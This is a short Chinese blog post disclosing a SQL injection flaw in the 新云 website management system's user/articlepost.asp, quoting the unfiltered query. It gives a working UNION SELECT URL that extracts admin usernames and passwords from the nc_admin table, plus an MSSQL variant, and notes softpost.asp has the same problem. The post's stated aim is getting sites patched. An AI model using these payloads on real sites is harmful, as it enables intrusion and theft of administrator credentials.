新云网站管理系统articlepost.asp文件注入漏洞

来自:守护天使's blog

user\articlepost.asp文件第333行。
代码如下
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And username='" & Newasp.MemberName & "' And ArticleID=" & Request("ArticleID")
Request("ArticleID")直接就放到查询语句里面了。
看上下的代码,没有任何过滤。只有用户是否有权限发文章的检查。
OK,然后就综合上下文的代码,可以构造语句。
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入这个语句,就可以爆出管理员的表和代码。
如果是MSSQL的。articlepost.asp?ChannelID=1&action=view&ArticleID=1;–是可以直接利用的。

另外在同文件夹下的softpost.asp文件存在类似的问题。所以,请大家及时修补漏洞。

相关日志

发表评论